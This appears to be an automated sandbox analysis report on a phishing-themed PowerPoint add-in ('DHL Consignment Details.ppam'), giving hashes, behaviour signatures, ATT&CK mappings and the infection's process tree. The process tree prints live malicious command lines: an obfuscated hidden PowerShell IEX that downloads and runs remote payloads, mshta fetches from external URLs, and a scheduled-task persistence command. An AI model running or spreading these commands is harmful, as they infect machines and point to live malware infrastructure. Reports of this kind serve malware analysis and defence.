Overview

overview

10

Static

static

DHL Consig...s.ppam

windows7_x64

10

DHL Consig...s.ppam

windows10_x64

10

Analysis

  • max time kernel
    123s
  • max time network
    143s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    19-10-2021 06:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    DHL Consignment Details.ppam

  • Size

    8KB

  • MD5

    e49c885d3236afa32adef83e8a201573

  • SHA1

    f8e63da458adee3ece85529ddeba477a07087430

  • SHA256

    6f931b139cdf0652432a133e3beef1ff6136571c8d953f3eee28316bbf9c5674

  • SHA512

    7339c4c43193686e737c6c4dbfcaf7778195e2c51d057436426651c1a62375196f393b69e6abcffa1ca2fc75c4117fb719b5b51b3eb4bd4335c85a8d08f0e3ff

Score
10/10
persistence

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 10 IoCs
  • Adds Run key to start application 2 TTPs 5 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Kills process with taskkill 2 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\DHL Consignment Details.ppam"
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:948
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1752
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\System32\mshta.exe" https://www.bitly.com/ajdwwdwdwdmlrufhjwijjd
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Adds Run key to start application
        • Modifies Internet Explorer settings
        • Modifies system certificate store
        • Suspicious use of WriteProcessMemory
        PID:1860
        • C:\Windows\SysWOW64\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /f /im winword.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1740
        • C:\Windows\SysWOW64\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1736
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_e7293c57732f4f278d939202241e0b25.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_cf83a79c40724f5c8e18bb53de0f0399.txt').GetResponse().GetResponseStream()).ReadToend());
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1700
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/12.html\""
          3⤵
          • Creates scheduled task(s)
          PID:1012

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Modify Registry

    3
    T1112

    Install Root Certificate

    1
    T1130

    Credential Access

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/948-66-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/948-54-0x0000000071A61000-0x0000000071A63000-memory.dmp
      Filesize

      8KB

      Download
    • memory/948-59-0x0000000005AD0000-0x0000000005AD2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/948-55-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/948-57-0x0000000076961000-0x0000000076963000-memory.dmp
      Filesize

      8KB

      Download
    • memory/948-53-0x0000000074A31000-0x0000000074A35000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1012-64-0x0000000000000000-mapping.dmp
      Download
    • memory/1700-68-0x0000000000270000-0x0000000000271000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1700-70-0x0000000000272000-0x0000000000274000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1700-63-0x0000000000000000-mapping.dmp
      Download
    • memory/1700-69-0x0000000000271000-0x0000000000272000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1736-62-0x0000000000000000-mapping.dmp
      Download
    • memory/1740-61-0x0000000000000000-mapping.dmp
      Download
    • memory/1752-58-0x000007FEFC271000-0x000007FEFC273000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1752-56-0x0000000000000000-mapping.dmp
      Download
    • memory/1860-67-0x0000000007490000-0x0000000007491000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1860-60-0x0000000000000000-mapping.dmp
      Download